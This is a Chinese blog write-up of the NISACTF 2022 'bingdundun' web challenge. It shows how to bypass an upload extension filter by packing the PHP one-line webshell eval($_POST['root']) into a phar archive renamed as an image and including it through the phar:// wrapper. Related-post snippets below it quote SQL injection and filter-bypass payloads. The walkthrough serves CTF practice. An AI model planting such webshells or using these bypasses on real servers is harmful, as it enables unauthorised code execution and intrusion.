[NISACTF 2022]bingdundun~

已于 2023-02-03 15:04:12 修改
阅读量726 收藏 2
点赞数
分类专栏: CTF 文章标签: php 网络安全
于 2023-02-02 14:26:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46266259/article/details/128849711
版权

文章目录

本题考点

phar伪协议实现文件包含

做题过程
  1. 注意观察,首先给出了一个链接,点进去后可以发现两个页面都存在//index.php,而且 url 多了一个参数bingdundun,疑似文件包含,改成?bingdundun=index试试
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述

  1. 可以发现直接套娃起来了,那么可以推测出是在后面加上.php,然后进行文件包含。

  2. 接着上传 shell 文件试试,bp 抓包 fuzz 后可以发现对文件后缀名有严格限制,而且也不能上传配置文件,那么既不能上传 php 文件,也不能包含非 php 文件( \x00 的截断在 php>5.3.4 就没用了,而且还要考虑 GPC ,所以是比较鸡肋的方法)。其实我们可以通过 zip 协议和 phar 协议来包含文件。这道题似乎 zip 协议包含不成功。

  3. zip 应该很多人都知道,但 phar 是什么?phar ( php archive ) 是 PHP 里类似于 jar ( java archive ) 的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么 .phar 后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。而phar://的伪协议,可以将任意后缀名的压缩包(原来是 .phar 或 .zip,注意:PHP > =5.3.0 压缩包需要是zip协议压缩,rar不行 ) 解包,从而可以通过上传压缩包绕过对后缀名的限制,再利用伪协议实现文件包含。

  4. 因此先要生成一个压缩包文件,这里就有两个方向,一是生成zip文件,可以直接将一句话木马压缩为 .zip 文件;二是生成 phar 文件

    注意:默认phar扩展是只读模式,需要手动配置php.ini中phar.readonly= Off

    且无法用ini_set修改

  5. 先了解一手 phar 文件格式

    • stub是phar文件的文件头,格式为...<?php ...;__HALT_COMPILER();?>...可以是任意字符,包括留空,且 php 闭合符与最后一个分号之间不能有多于一个的空格符。另外 php 闭合符也可省略。包含在 php 代码块中的语句在 phar 文件被包含时被执行。最短省略闭合符的stub是__HALT_COMPILER();?>。前面的内容是没有限制的,也就是说我们可以构造一个图片文件或者 pdf 文件来绕过上传的限制,将这个phar文件上传上去。

      <?php
	$phar = new Phar('demo.phar');
	$phar->setStub('<?php echo \'in stub!\';__HALT_COMPILER();?>');
	include('phar://demo.phar');
?>
// in stub!

    • manifest describing the contents存放着压缩文件的信息,每个被压缩文件的权限,属性等信息都放在这里,这里还会以序列化的形式存储着用户自定义的meta-dataphar文件存储meta-data时会先将内容序列化后再存入进去,当文件操作函数通过phar://伪协议解析phar文件时就会先将数据反序列化,这样就可以构成反序列化攻击。这里是phar反序列化攻击最核心的地方,但对这道题没有帮助。

    • the file contents:被压缩文件的内容,这里写入一句话木马,但对 phar 反序列化攻击没有帮助

    • signature:可选,phar文件的签名,允许的有MD5, SHA1, SHA256, SHA512和OPENSSL

  6. 如何生成一个 phar 文件?phar类提供对phar文件的操作,具体可以参考这篇博客

  7. 这里给出参考代码,运行后可在目录下发现生成的 shell.phar 文件,为了绕过上传文件后缀名限制,需要修改文件名为 shell.jpg

    <?php
    $payload = '<?php eval($_POST["root"]); ?>';  // 一句话木马
    $phar = new Phar("shell.phar");  // 后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>");  // 设置stub
    $phar->addFromString("1.php", "$payload");  // 添加要压缩的文件
    // $phar->setMetadata(...);  // 在metadata添加内容,可参考 phar反序列化,此处用不着,故注释
    $phar->stopBuffering();
?>

  8. 上传后利用phar://伪协议读取文件,因为phar伪协议不看后缀名,主要看标识来判定,因此可以改成任意后缀。
    在这里插入图片描述
    在这里插入图片描述

  9. phar文件同理,都要注意后缀名会自动加上.php

ph0ebus
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NISACTF 2022]bingdundun wp
Leaf_initial的博客
04-14 395
这里大部分人可能会报错,这个错误信息表示在运行phar.php文件时,创建归档文件“exp.phar”的功能被禁用了。由于我一直报错,不能生成文件,改了也没有用,所以找到了第二种解决办法,在php文件的目录下打开cmd,然后命令行输入。(但是不知道为什么我的phpinfo信息不能显示,于是重新上传了一个,变量名改了一下,改成了8,就可以了)可以看到example.phar压缩文件中有phar.php文件,里面有一个php代码,内容是一句话木马。连接成功,在根目录中的flag文件找到了flag,结束。
[NISACTF 2022]bingdundun
jhk8698的博客
10-19 1692
[NISACTF 2022]bingdundun 刷题记录
2022 SWPUCTF Web+Crypto方向wp
ph0ebus的博客
10-29 6295
简单阅读代码可以发现,__wakeup()方法会首先被激活,覆盖变量的值使flag不能被回显,因此这里需要绕过__wakeup()方法,__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。然后想办法读取文件,cat tac tail都被过滤了,那我们还可以利用nl查看文件内容,这里发现数字被过滤了,我们想到了*来匹配,但是*也被过滤了,尽管如此,我们还可以用?但是里面没有看到类似flag的东西,那就进入根目录看看,但是空格被过滤了,可以用${IFS}绕过。
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 4363
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
NISACTF2022公开通道
as you know, nlp is fantasitc!
03-29 2122
NISACTF2022公开通道checkinlevel_up第一层 robots.txt第二层 md5碰撞第三层 sha1碰撞第四层 parse_url解析漏洞第五层create_function()注入bingdundunbabyserializebabyuploadeasyssrfis secret(原题)popchain(原题)middlevel(原题) 题目 checkin urlencode,因为解释器读取出来的才是真正的顺序 ahahahaha=jitanglailo&&%E2%
[NISACTF 2022]checkin
qq_40567274的博客
04-08 4530
[NISACTF 2022] 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 提示:以下是本篇文章正文内容,下面案例可供参考 题目-join-us -1' || (select*from aa)# -1'||extractvalue(1,concat(0x5c,(select group_concat(table_name)from information_schema.tables where table_schema like 'sqlsql')))# -1' || extrac
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
关于[NISACTF 2022]babyserialize详解
weixin_57222016的博客
05-06 2374
前言 先甩出PHP的魔术方法。 __invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法 __construst():具有构造函数的类在创建新对象的时候,回调此方法 __destruct():反序列化的时候,或者对象销毁的时候调用 __wakeup():反序列化的时候调用 __sleep():序列化的时候调用 __toString():把类当成字符串的时候调用,一般在echo处生效 __set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
NISACTF_WriteUp
The code way of kinnisoy
03-28 6321
WriteUp 文章目录WriteUpWEBcheckinlevel-upis secretPWNReorPwn?CRYPTOsign_cryptofunnycaesernormalxorMISC签到huaji?bqtwhere_is_here不愉快的地方福利题问卷 WEB checkin 题目: 以为白给题,结果输入不对,f12查看源码。发现一些奇怪的东西: down了源码,本地打开复制‮⁦Ugeiwo⁩⁦cuishiyuan Payload: http://120.27.195.236:28990/
[NISACTF 2022]上
qq_62046696的博客
07-26 3458
php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4666
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
深入解析PHP函数
NatLindsay的博客
06-17 509
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
[极客大挑战 2020]Roamphp4-Rceme
最新发布
不会编程的崽的博客
06-20 352
右键源代码里给了提示,有备份文件index.php.swp,大伙都做到这来了,应该不用写了吧。加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]passthru(next(getallheaders()));然后,需要要绕过两层,多年rce经验,相信你一眼能看出。我们由内往外构造,这里需要前置知识(贴其他大佬的吧)知道原因可以在评论区踢我一脚。
Linux-安装及管理程序
A6985HG的博客
06-19 718
定义:本地Yum源是指将软件包存储在本地服务器或存储设备上的源。这些软件包可以是从官方源下载后本地存储的,也可以是用户自己编译的软件包。优点:本地Yum源的主要优势在于访问速度和可控性。由于软件包位于本地网络或服务器上,因此安装和更新速度快,尤其是在没有稳定互联网连接或需要大规模部署的情况下更为实用。
k8s解决java服务下载超时问题
云深海阔专栏
06-18 224
我们在走ingress的java程序的时候,往往会有导出数据的功能,这个时候就会有因网络慢、后台处理时间过长导致下载超时,也有因下载文件太大,导致下载失败,综合解决办法如下。1)更改反向代理超时时间。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值